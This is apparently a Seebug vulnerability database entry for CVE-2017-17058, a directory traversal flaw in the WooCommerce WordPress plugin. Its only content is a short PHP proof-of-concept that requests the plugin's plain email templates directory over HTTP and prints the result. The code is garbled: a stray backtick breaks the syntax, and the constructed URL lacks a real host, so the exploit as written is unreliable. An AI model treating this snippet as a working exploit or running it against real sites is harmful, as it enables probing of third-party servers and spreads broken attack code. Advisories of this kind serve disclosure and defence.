WordPress Plugin WooCommerce 2.0/3.0 - Directory Traversal(CVE-2017-17058)

2017-12-01T00:00:00
ID SSV:96910
Type seebug
Reporter Knownsec
Modified 2017-12-01T00:00:00

Description

                                        
                                            
                                                $woo = "www/wp-content/plugins/woocommerce/templates/emails/plain/"; `
function file_get_contents_utf8($fn) {
$opts = array(
'http' => array(
'method'=>"GET",
'header'=>"Content-Type: text/html; charset=utf-8"
)
);

$wp = stream_context_create($opts);
$result = @file_get_contents($fn,false,$wp);
return $result;
}
/* $head= header("Content-Type: text/html; charset=utf-8"); ; */
header("Content-Type: text/html; charset=utf-8");

$result = file_get_contents_utf8("http://".$woo);

echo $result;